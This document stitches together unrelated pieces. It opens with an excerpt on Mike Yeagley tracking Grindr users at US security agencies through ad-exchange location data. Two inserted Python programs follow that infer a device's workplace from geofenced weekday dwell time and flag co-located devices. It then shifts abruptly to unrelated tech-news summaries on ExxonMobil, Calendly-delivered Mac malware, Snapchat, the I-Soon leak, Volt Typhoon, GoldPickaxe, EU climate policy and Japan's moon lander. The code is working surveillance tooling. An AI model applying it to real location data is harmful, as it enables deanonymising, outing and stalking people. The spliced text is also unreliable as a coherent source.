As he would explain in a succession of bland government conference rooms, Yeagley was able to access the geolocation data on Grindr users through a hidden but ubiquitous entry point: the digital advertising exchanges that serve up the little digital banner ads along the top of Grindr and nearly every other ad-supported mobile app and website. This was possible because of the way online ad space is sold, through near-instantaneous auctions in a process called real-time bidding. Those auctions were rife with surveillance potential. You know that ad that seems to follow you around the internet? It's tracking you in more ways than one. In some cases, it's making your precise location available in near-real time to both advertisers and people like Mike Yeagley, who specialized in obtaining unique data sets for government agencies.

Working with Grindr data, Yeagley began drawing geofences -- creating virtual boundaries in geographical data sets -- around buildings belonging to government agencies that do national security work. That allowed Yeagley to see what phones were in certain buildings at certain times, and where they went afterwards. He was looking for phones belonging to Grindr users who spent their daytime hours at government office buildings. If the device spent most workdays at the Pentagon, the FBI headquarters, or the National Geospatial-Intelligence Agency building at Fort Belvoir, for example, there was a good chance its owner worked for one of those agencies. Then he started looking at the movement of those phones through the Grindr data. When they weren't at their offices, where did they go? A small number of them had lingered at highway rest stops in the DC area at the same time and in proximity to other Grindr users -- sometimes during the workday and sometimes while in transit between government facilities. For other Grindr users, he could infer where they lived, see where they traveled, even guess at whom they were dating.
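The geofence step described above is ordinary geospatial analysis, which is the uncomfortable point of the story: nothing about it requires access to a phone, only the location fields an ad exchange already hands out. The following is an added example (not Wired's, Yeagley's or PlanetRisk's code) that takes bid-request style records, tests each point against polygon fences with a ray-casting point-in-polygon check, and reports which devices spend their weekday working hours inside a fence. The fences, device ids and coordinates are constructed and do not correspond to any real building; the timestamps are assumed to already be in local time.

```python
"""Dwell-time inference over ad-exchange location records, as described above.

Added example, not from Wired, Mike Yeagley or PlanetRisk. Takes bid-request style
records (device id, timestamp, lat, lon), tests each point against geofence polygons,
and reports devices seen inside a fence on enough distinct weekdays during work hours
to infer a workplace. Fences, device ids and coordinates are constructed and do not
correspond to any real building; timestamps are assumed to be local time.
"""
from collections import defaultdict
from datetime import datetime

# Hypothetical fences as polygons of (lat, lon) vertices; any vertex order works.
FENCES = {
    "SITE_A": [(40.0100, -75.0100), (40.0100, -75.0000), (40.0200, -75.0000), (40.0200, -75.0100)],
    "SITE_B": [(40.0500, -75.0500), (40.0500, -75.0400), (40.0600, -75.0400), (40.0600, -75.0500)],
}
WORK_HOURS = range(9, 17)   # 09:00 to 16:59
MIN_WORKDAYS = 3            # distinct weekdays inside a fence before calling it a workplace


def point_in_polygon(lat, lon, poly):
    """Ray casting: a horizontal ray from the point crosses an odd number of edges iff inside."""
    inside = False
    n = len(poly)
    for i in range(n):
        (y1, x1), (y2, x2) = poly[i], poly[(i + 1) % n]      # x = lon, y = lat
        if (y1 > lat) != (y2 > lat):
            x_cross = x1 + (lat - y1) * (x2 - x1) / (y2 - y1)
            if lon < x_cross:
                inside = not inside
    return inside


def parse_records(text):
    """Parse 'device,iso_timestamp,lat,lon' lines into (device, datetime, lat, lon) tuples."""
    records = []
    for line in text.strip().splitlines():
        dev, ts, lat, lon = line.split(",")
        records.append((dev, datetime.fromisoformat(ts), float(lat), float(lon)))
    return records


def workday_presence(records):
    """{device: {fence: set of ISO dates}} counting only weekday, work-hour observations."""
    seen = defaultdict(lambda: defaultdict(set))
    for dev, ts, lat, lon in records:
        if ts.weekday() >= 5 or ts.hour not in WORK_HOURS:
            continue
        for name, poly in FENCES.items():
            if point_in_polygon(lat, lon, poly):
                seen[dev][name].add(ts.date().isoformat())
    return seen


def likely_workplaces(records, min_days=MIN_WORKDAYS):
    """{device: fence} for devices inside one fence on at least min_days distinct workdays."""
    result = {}
    for dev, fences in workday_presence(records).items():
        fence, dates = max(fences.items(), key=lambda kv: len(kv[1]))
        if len(dates) >= min_days:
            result[dev] = fence
    return result


# Constructed bid-request sample: 2024-03-04 is a Monday, 2024-03-09 a Saturday.
SAMPLE_BIDS = """\
dev-1,2024-03-04T10:15:00,40.0150,-75.0050
dev-1,2024-03-05T11:02:00,40.0160,-75.0040
dev-1,2024-03-06T14:30:00,40.0140,-75.0060
dev-1,2024-03-06T20:05:00,40.0550,-75.0450
dev-2,2024-03-04T09:45:00,40.0550,-75.0450
dev-2,2024-03-05T09:50:00,40.0560,-75.0440
dev-3,2024-03-09T12:00:00,40.0150,-75.0050
dev-3,2024-03-10T12:00:00,40.0150,-75.0050
dev-4,2024-03-04T10:00:00,40.0300,-75.0050
"""

if __name__ == "__main__":
    for dev, fence in likely_workplaces(parse_records(SAMPLE_BIDS)).items():
        print(f"{dev}: weekday presence at {fence}")
```

In the sample, only dev-1 clears the bar: dev-2 is inside a fence on two workdays, dev-3 only at weekends, and dev-4 never inside one. The threshold and hours are the analyst's choice, and the same records also answer the follow-on questions in the article (where a flagged device goes in the evening, and which other devices are co-located with it) with nothing more than a second fence or a time-window join; for an organisation assessing its own exposure, that is the argument for treating precise location in ad traffic from employee devices as a leak rather than a telemetry convenience.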

Intelligence agencies have a long and unfortunate history of trying to root out LGBTQ Americans from their workforce, but this wasn't Yeagley's intent. He didn't want anyone to get in trouble. No disciplinary actions were taken against any employee of the federal government based on Yeagley's presentation. His aim was to show that buried in the seemingly innocuous technical data that comes off every cell phone in the world is a rich story -- one that people might prefer to keep quiet. Or at the very least, not broadcast to the whole world. And that each of these intelligence and national security agencies had employees who were recklessly, if obliviously, broadcasting intimate details of their lives to anyone who knew where to look. As Yeagley showed, all that information was available for sale, for cheap. And it wasn't just Grindr, but rather any app that had access to a user's precise location -- other dating apps, weather apps, games. Yeagley chose Grindr because it happened to generate a particularly rich set of data and its user base might be uniquely vulnerable.

The report goes into great detail about how analysis of commercial adtech data, notably through a program called Locomotive developed by PlanetRisk, enabled the tracking of mobile devices associated with Russian President Vladimir Putin's entourage. By analyzing precise geolocation information collected from mobile advertising bid requests, analysts were able to monitor the movements of phones that frequently accompanied Putin, revealing the locations and movements of his security personnel, aides, and support staff.

This capability underscored the surveillance potential of commercially available data, providing insights into the activities and security arrangements of high-profile individuals without directly compromising their personal devices.
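The workplace attribution and co-location inference described in the Grindr passage and the Locomotive summary above, as an added example that is not code from the page, the book it excerpts, or PlanetRisk. It works from the only fields an ad-tech bid request reliably carries (a device identifier, latitude, longitude, timestamp): a device seen inside an office geofence during working hours on several weekdays is attributed to that office, and two devices whose pings fall within a few dozen metres and a few minutes of each other are recorded as co-located. The site names, coordinates, radii, device identifiers and pings are all constructed for the example, and circular fences stand in for real building footprints.

```python
"""Geofence and co-location inference over constructed ad-tech location pings.

Added example, not code from the page or the book/report it excerpts.
Site centroids, radii, device ids and pings are constructed; the fences
are circles (a real analysis would use building footprints).
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from itertools import combinations
from math import asin, cos, radians, sin, sqrt


@dataclass(frozen=True)
class Ping:
    device: str   # advertising identifier, constructed
    lat: float
    lon: float
    ts: datetime


# Assumed circular geofences: name -> (lat, lon, radius_m, kind).
# "office" fences drive workplace attribution; "other" fences only
# matter for co-location. Coordinates are placeholders, not real sites.
SITES = {
    "agency_hq_a": (38.8710, -77.0560, 300.0, "office"),
    "agency_hq_b": (38.8950, -77.0250, 250.0, "office"),
    "rest_stop":   (38.9500, -77.1000, 150.0, "other"),
}


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two WGS84 points."""
    r = 6371000.0
    dlat, dlon = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * r * asin(sqrt(a))


def site_for(ping):
    """Name of the first geofence containing the ping, or None."""
    for name, (lat, lon, radius, _kind) in SITES.items():
        if haversine_m(ping.lat, ping.lon, lat, lon) <= radius:
            return name
    return None


def workplace_attribution(pings, min_days=3, start_hour=9, end_hour=17):
    """Map device -> office fence for devices seen inside that fence during
    working hours on at least min_days distinct weekdays."""
    seen = defaultdict(lambda: defaultdict(set))   # device -> site -> {date}
    for p in pings:
        if p.ts.weekday() >= 5 or not (start_hour <= p.ts.hour < end_hour):
            continue                                # weekend or after hours
        site = site_for(p)
        if site is not None and SITES[site][3] == "office":
            seen[p.device][site].add(p.ts.date())
    attributed = {}
    for device, per_site in seen.items():
        site, dates = max(per_site.items(), key=lambda kv: len(kv[1]))
        if len(dates) >= min_days:
            attributed[device] = site
    return attributed


def colocations(pings, radius_m=50.0, window_s=600):
    """Sorted (device_a, device_b, site) triples for pings from different
    devices within radius_m and window_s of each other."""
    events = set()
    for p, q in combinations(pings, 2):
        if p.device == q.device or abs((p.ts - q.ts).total_seconds()) > window_s:
            continue
        if haversine_m(p.lat, p.lon, q.lat, q.lon) <= radius_m:
            a, b = sorted((p.device, q.device))
            events.add((a, b, site_for(p)))
    return sorted(events, key=lambda e: (e[0], e[1], e[2] or ""))


def _at(device, site, when):
    """Constructed ping placed exactly on a fence centroid."""
    lat, lon, _r, _k = SITES[site]
    return Ping(device, lat, lon, datetime.fromisoformat(when))


SAMPLE_PINGS = [                                   # constructed data
    _at("dev-A", "agency_hq_a", "2024-01-08T10:00:00"),   # Mon
    _at("dev-A", "agency_hq_a", "2024-01-09T10:30:00"),   # Tue
    _at("dev-A", "agency_hq_a", "2024-01-10T11:00:00"),   # Wed
    _at("dev-B", "agency_hq_b", "2024-01-08T09:15:00"),
    _at("dev-B", "agency_hq_b", "2024-01-09T09:15:00"),
    _at("dev-B", "agency_hq_b", "2024-01-10T09:15:00"),
    _at("dev-B", "agency_hq_b", "2024-01-11T09:15:00"),
    _at("dev-C", "agency_hq_a", "2024-01-13T10:00:00"),   # Saturday: ignored
    _at("dev-C", "agency_hq_a", "2024-01-09T20:00:00"),   # after hours: ignored
    _at("dev-A", "rest_stop", "2024-01-11T14:00:00"),     # Thu, workday
    _at("dev-B", "rest_stop", "2024-01-11T14:04:00"),     # 4 min later, same spot
    Ping("dev-C", 39.2000, -76.6000, datetime.fromisoformat("2024-01-11T14:02:00")),
]

if __name__ == "__main__":
    print("workplaces:", workplace_attribution(SAMPLE_PINGS))
    print("co-located:", colocations(SAMPLE_PINGS))
```

The thresholds (three weekdays, a 50 m / 10 minute co-location window) are the knobs an analyst would tune against the density of a real feed; the point is that nothing here needs the app's own data, only the location pings it hands to advertising intermediaries.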
The Courts

ExxonMobil Is Suing Investors Who Want Faster Climate Action (npr.org) 110

An anonymous reader quotes a report from NPR: ExxonMobil faces dozens of lawsuits from states and localities alleging the company lied for decades about its role in climate change and the dangers of burning fossil fuels. But now, ExxonMobil is going on the offensive with a lawsuit targeting investors who want the company to slash pollution that's raising global temperatures. Investors in publicly-traded companies like ExxonMobil try to shape corporate policies by filing shareholder proposals that are voted on at annual meetings. ExxonMobil says it's fed up with a pair of investor groups that it claims are abusing the system by filing similar proposals year after year in an effort to micromanage its business.

ExxonMobil's lawsuit points to growing tensions between companies and activist investors calling for corporations to do more to shrink their climate impact and prepare for a hotter world. Interest groups on both sides of the case say it could unleash a wave of corporate litigation against climate activists. It is happening at a time when global temperatures continue to rise, and corporate analysts say most companies aren't on track to meet targets they set to reduce their heat-trapping emissions. "Exxon is really upping the ante here in a big way by bringing this case," says Josh Zinner, chief executive of an investor coalition called the Interfaith Center on Corporate Accountability, whose members include a defendant in the ExxonMobil case. "Other companies could use this tactic not just to block resolutions," Zinner says, "but to intimidate their shareholders from even bringing these [climate] issues to the table."

ExxonMobil said in an email that it is suing the investor groups Arjuna Capital and Follow This because the U.S. Securities and Exchange Commission (SEC) isn't enforcing rules governing when investors can resubmit shareholder proposals. A court is "the right place to get clarity on SEC rules," ExxonMobil said, adding that the case "is not about climate change." Other corporations are watching ExxonMobil's case, says Charles Crain, a vice president at the National Association of Manufacturers, which represents ExxonMobil and other industrial companies. "If companies are decreasingly able to get the SEC to allow them to exclude proposals that are obviously politically motivated, then the next question is, well, can the courts succeed where the SEC has failed -- or, more accurately, not even tried?," Crain says.
"The shareholder proposal from Arjuna and Follow This called for ExxonMobil to cut emissions faster from its own operations and from its supply chain, including the pollution that's created when customers burn its oil and natural gas," notes NPR. "That indirect pollution, known as Scope 3 emissions, accounts for 90% of ExxonMobil's carbon footprint."

"ExxonMobil says it is committed to cutting emissions from its operations. But the idea that activist investors like Arjuna and Follow This can quickly push the company out of the oil and gas business with new climate policies is 'simplistic and against the interests of the vast majority of ExxonMobil shareholders,' the company said in a court filing in Texas." The company added that while shareholders are entitled to submit proposals, they don't have "an unlimited right to put forth any proposal to do anything."

"Their intent is to advance their agenda rather than creating long-term value for shareholders," ExxonMobil said of Arjuna and Follow This.
Links

Calendar Meeting Links Used To Spread Mac Malware (krebsonsecurity.com) 17

Hackers targeting individuals in the cryptocurrency sector are using a sophisticated phishing scheme that begins with a malicious link on Calendly. "The attackers impersonate established cryptocurrency investors and ask to schedule a video conference call," reports Krebs on Security. "But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems." From the report: A search in Google for a string of text from that script turns up a December 2023 blog post from cryptocurrency security firm SlowMist about phishing attacks on Telegram from North Korean state-sponsored hackers. "When the project team clicks the link, they encounter a region access restriction," SlowMist wrote. "At this point, the North Korean hackers coax the team into downloading and running a 'location-modifying' malicious script. Once the project team complies, their computer comes under the control of the hackers, leading to the theft of funds."

SlowMist says the North Korean phishing scams used the "Add Custom Link" feature of the Calendly meeting scheduling system on event pages to insert malicious links and initiate phishing attacks. "Since Calendly integrates well with the daily work routines of most project teams, these malicious links do not easily raise suspicion," the blog post explains. "Consequently, the project teams may inadvertently click on these malicious links, download, and execute malicious code."

SlowMist said the malware downloaded by the malicious link in their case comes from a North Korean hacking group dubbed BlueNoroff, which Kaspersky Labs says is a subgroup of the Lazarus hacking group. "A financially motivated threat actor closely connected with Lazarus that targets banks, casinos, fin-tech companies, POST software and cryptocurrency businesses, and ATMs," Kaspersky wrote of BlueNoroff in Dec. 2023.

The Courts

Snapchat Isn't Liable For Connecting 12-Year-Old To Convicted Sex Offenders (arstechnica.com) 59

An anonymous reader quotes a report from Ars Technica: A judge has dismissed (PDF) a complaint from a parent and guardian of a girl, now 15, who was sexually assaulted when she was 12 years old after Snapchat recommended that she connect with convicted sex offenders. According to the court filing, the abuse that the girl, C.O., experienced on Snapchat happened soon after she signed up for the app in 2019. Through its "Quick Add" feature, Snapchat "directed her" to connect with "a registered sex offender using the profile name JASONMORGAN5660." After a little more than a week on the app, C.O. was bombarded with inappropriate images and subjected to sextortion and threats before the adult user pressured her to meet up, then raped her. Cops arrested the adult user the next day, resulting in his incarceration, but his Snapchat account remained active for three years despite reports of harassment, the complaint alleged.

Two years later, at 14, C.O. connected with another convicted sex offender on Snapchat, a former police officer who offered to give C.O. a ride to school and then sexually assaulted her. The second offender is also currently incarcerated, the judge's opinion noted. The lawsuit painted a picture of Snapchat's ongoing neglect of minors it knows are being targeted by sexual predators. Prior to C.O.'s attacks, both adult users sent and requested sexually explicit photos, seemingly without the app detecting any child sexual abuse materials exchanged on the platform. C.O. had previously reported other adult accounts sending her photos of male genitals, but Snapchat allegedly "did nothing to block these individuals from sending her inappropriate photographs."

Among other complaints, C.O.'s lawsuit alleged that Snapchat's algorithm for its "Quick Add" feature was the problem. It allegedly recklessly works to detect when adult accounts are seeking to connect with young girls and, by design, sends more young girls their way -- continually directing sexual predators toward vulnerable targets. Snapchat is allegedly aware of these abuses and, therefore, should be held liable for harm caused to C.O., the lawsuit argued. Although C.O.'s case raised difficult questions, Judge Barbara Bellis ultimately agreed with Snapchat that Section 230 of the Communications Decency Act barred all claims and shielded Snap because "the allegations of this case fall squarely within the ambit of the immunity afforded to" platforms publishing third-party content. According to Bellis, C.O.'s family had "clearly alleged" that Snap had failed to design its recommendations systems to block young girls from receiving messages from sexual predators. Specifically, Section 230 immunity shields Snap from liability in this case because Bellis considered the messages exchanged to be third-party content. Snapchat designing its recommendation systems to deliver content is a protected activity, Bellis ruled.
Despite a seemingly conflicting ruling in Los Angeles that found that "Section 230 didn't protect Snapchat from liability for allegedly connecting teens with drug dealers," Bellis didn't appear to consider it persuasive. She did, however, critique Section 230's broad application, suggesting courts are limited without legislative changes, despite the morally challenging nature of some cases.
China

Leaked Hacking Files Show Chinese Spying On Citizens and Foreigners Alike (pbs.org) 18

An anonymous reader quotes a report from PBS: Chinese police are investigating an unauthorized and highly unusual online dump of documents from a private security contractor linked to the nation's top policing agency and other parts of its government -- a trove that catalogs apparent hacking activity and tools to spy on both Chinese and foreigners. Among the apparent targets of tools provided by the impacted company, I-Soon: ethnicities and dissidents in parts of China that have seen significant anti-government protests, such as Hong Kong or the heavily Muslim region of Xinjiang in China's far west. The dump of scores of documents late last week and subsequent investigation were confirmed by two employees of I-Soon, known as Anxun in Mandarin, which has ties to the powerful Ministry of Public Security. The dump, which analysts consider highly significant even if it does not reveal any especially novel or potent tools, includes hundreds of pages of contracts, marketing presentations, product manuals, and client and employee lists. They reveal, in detail, methods used by Chinese authorities to surveil dissidents overseas, hack other nations and promote pro-Beijing narratives on social media.

The documents show apparent I-Soon hacking of networks across Central and Southeast Asia, as well as Hong Kong and the self-ruled island of Taiwan, which Beijing claims as its territory. The hacking tools are used by Chinese state agents to unmask users of social media platforms outside China such as X, formerly known as Twitter, break into email and hide the online activity of overseas agents. Also described are devices disguised as power strips and batteries that can be used to compromise Wi-Fi networks. I-Soon and Chinese police are investigating how the files were leaked, the two I-Soon employees told the AP. One of the employees said I-Soon held a meeting Wednesday about the leak and were told it wouldn't affect business too much and to "continue working as normal." The AP is not naming the employees -- who did provide their surnames, per common Chinese practice -- out of concern about possible retribution. The source of the leak is not known.
Jon Condra, an analyst with Recorded Future, a cybersecurity company, called it the most significant leak ever linked to a company "suspected of providing cyber espionage and targeted intrusion services for the Chinese security services." According to Condra, citing the leaked material, I-Soon's targets include governments, telecommunications firms abroad and online gambling companies within China.
United States

FBI Warns Chinese Malware Could Threaten Critical US Infrastructure (ft.com) 78

The FBI is "laser focused" on Chinese efforts to insert malicious software code into computer networks in ways that could disrupt critical US infrastructure, according to the agency's director Christopher Wray. From a report: Wray said he was acutely concerned about "pre-positioning" of malware. He said the US recently disrupted a Chinese hacking network known as Volt Typhoon that targeted American infrastructure including the electricity grid and water supply, and other targets around the world. "We're laser focused on this as a real threat and we're working with a lot of partners to try to identify it, anticipate it and disrupt it," Wray said on Sunday after attending the Munich Security Conference.

"I'm sober and clear minded about what we're up against...We're always going to have to be kind of on the balls of our feet." Wray said Volt Typhoon was just the tip of the iceberg and was one of many such efforts by the Chinese government. The US has been tracking Chinese pre-positioning operations for well over a decade, but Wray told the security conference that they had reached "fever pitch." He said China was increasingly inserting "offensive weapons within our critical infrastructure poised to attack whenever Beijing decides the time is right."

His comments are the latest FBI effort to raise awareness about Chinese espionage that ranges from traditional spying and intellectual property theft to hacking designed to prepare for possible future conflict. Last October, Wray and his counterparts from the Five Eyes intelligence-sharing network that includes the US, UK, Canada, Australia and New Zealand held their first public meeting in an effort to focus the spotlight on Chinese espionage. Wray said the US campaign was having an impact and that people were increasingly attuned to the threat, particularly compared with several years ago when he sometimes met scepticism.

Privacy

New 'Gold Pickaxe' Android, iOS Malware Steals Your Face For Fraud (bleepingcomputer.com) 13

An anonymous reader quotes a report from BleepingComputer: A new iOS and Android trojan named 'GoldPickaxe' employs a social engineering scheme to trick victims into scanning their faces and ID documents, which are believed to be used to generate deepfakes for unauthorized banking access. The new malware, spotted by Group-IB, is part of a malware suite developed by the Chinese threat group known as 'GoldFactory,' which is responsible for other malware strains such as 'GoldDigger', 'GoldDiggerPlus,' and 'GoldKefu.' Group-IB says its analysts observed attacks primarily targeting the Asia-Pacific region, mainly Thailand and Vietnam. However, the techniques employed could be effective globally, and there's a danger of them getting adopted by other malware strains. [...]

For iOS (iPhone) users, the threat actors initially directed targets to a TestFlight URL to install the malicious app, allowing them to bypass the normal security review process. When Apple removed the TestFlight app, the attackers switched to luring targets into downloading a malicious Mobile Device Management (MDM) profile that allows the threat actors to take control over devices. Once the trojan has been installed onto a mobile device in the form of a fake government app, it operates semi-autonomously, manipulating functions in the background, capturing the victim's face, intercepting incoming SMS, requesting ID documents, and proxying network traffic through the infected device using 'MicroSocks.'

Group-IB says the Android version of the trojan performs more malicious activities than in iOS due to Apple's higher security restrictions. Also, on Android, the trojan uses over 20 different bogus apps as cover. For example, GoldPickaxe can also run commands on Android to access SMS, navigate the filesystem, perform clicks on the screen, upload the 100 most recent photos from the victim's album, download and install additional packages, and serve fake notifications. The use of the victims' faces for bank fraud is an assumption by Group-IB, also corroborated by the Thai police, based on the fact that many financial institutes added biometric checks last year for transactions above a certain amount.

Earth

Making Farming More Climate-Friendly Is Hard. Just Ask Europe's Politicians. (nytimes.com) 186

The farmers' protests in Europe are a harbinger of the next big political challenge in global climate action: How to grow food without further damaging Earth's climate and biodiversity. From a report: On Tuesday, after weeks of intense protests in several cities across the continent, came the most explicit sign of that difficulty. The European Union's top official, Ursula von der Leyen, abandoned an ambitious bill to reduce the use of chemical pesticides and softened the European Commission's next raft of recommendations on cutting agricultural pollution. "We want to make sure that in this process, the farmers remain in the driving seat," she said at the European Parliament. "Only if we achieve our climate and environmental goals together will farmers be able to continue to make a living."

The farmers argue they're being hit from all sides: high fuel costs, green regulations, unfair competition from producers in countries with fewer environmental restrictions. Nonetheless, agriculture accounts for 30 percent of global greenhouse gas emissions, and it's impossible for the European Union to meet its ambitious climate targets, enshrined in law, without making dramatic changes to its agricultural system, including how farmers use chemical pesticides and fertilizers, as well as its vast livestock industry. It also matters politically. Changing Europe's farming practices is proving to be extremely difficult, particularly as parliamentary elections approach in June. Farmers are a potent political force, and food and farming are potent markers of European identity. Agriculture accounts for just over 1 percent of the European economy and employs 4 percent of its population. But it gets one-third of the E.U. budget, mostly as subsidies.

EU

The EU Proposes Slashing Pollution 90 Percent by 2040 (theverge.com) 95

The European Commission today recommended reducing carbon dioxide emissions from fossil fuels by 90 percent by 2040 compared to 1990 levels. From a report: At face value, it's an ambitious target for transforming the European Union's energy system. As always, though, the devil is in the details. And the proposed plan is already garnering a range of strong reactions. A formal proposal still needs to be issued, but it has already faced pushback on how much of those pollution cuts should come from risky tactics aimed at capturing rather than preventing pollution. Some environmental groups are also criticizing a glaring omission in the draft: while it mentions phasing out coal, there's no strategy to phase out oil and gas.

"You can set targets to cut greenhouse gases as high as you like, but without a clear plan to phase-out the fossil fuels that are producing them they simply aren't credible. It's like building a bike without pedals, how are you going to power it?" Dominic Eagleton, senior fossil fuels campaigner at the nonprofit Global Witness, said in a statement today. The world actually came tantalizingly close to a deal to phase out fossil fuels during a United Nations climate conference in Dubai last December. Despite dozens of countries pushing for that kind of commitment, the agreement ultimately calls for "transitioning away from fossil fuels in energy systems, in a just, orderly and equitable manner." It also carves out room for controversial technologies for capturing carbon dioxide pollution.

Moon

Japan's Moon Lander Snaps Final Photo, Goes Dormant Before 354-Hour Lunar Night (mashable.com) 12

"Japan's first moon mission has likely come to an end after a surprising late-game comeback," reports Mashable, "with the spacecraft taking one last photo of its surroundings before the deep-freeze of night... showing ominous shadows cast upon a slope of the Shioli crater, its landing site on the near side of the moon." Since Monday, the spacecraft has analyzed rocks around the crater with a multi-band spectral camera. JAXA picked the landing spot because of what it could tell scientists about the moon's formation... The special camera completed its planned observation, able to study more targets than originally expected, according to an English translation of a news release from the space agency... "Based on the large amount of data we have obtained, we are proceeding with (analyses) to identify rocks and estimate the chemical composition of minerals, which will help solve the mystery of the origin of the moon," JAXA said in a statement translated by Google...

The spacecraft has now entered a dormant state, prompted by nightfall on the moon. Because one rotation of the moon is about 27 Earth days, the so-called "lunar night," when the moon is no longer receiving sunlight, lasts about two weeks. Not much can survive the -270 degrees Fahrenheit brought on by darkness — not even robots. In this freezing temperature, soldered joints on hardware and mechanical parts break, and batteries die. But rest assured, the JAXA team will try to communicate with its scrappy moon lander when the sun rises again.

In mid-week Japan's space agency posted that "Although SLIM was not designed for the harsh lunar nights, we plan to try to operate again from mid-February, when the Sun will shine again on SLIM's solar cells."

Later they posted that they'd sent a command to turn on SLIM's communicator again "just in case, but with no response, we confirmed SLIM had entered a dormant state. This is the last scene of the Moon taken by SLIM before dusk."
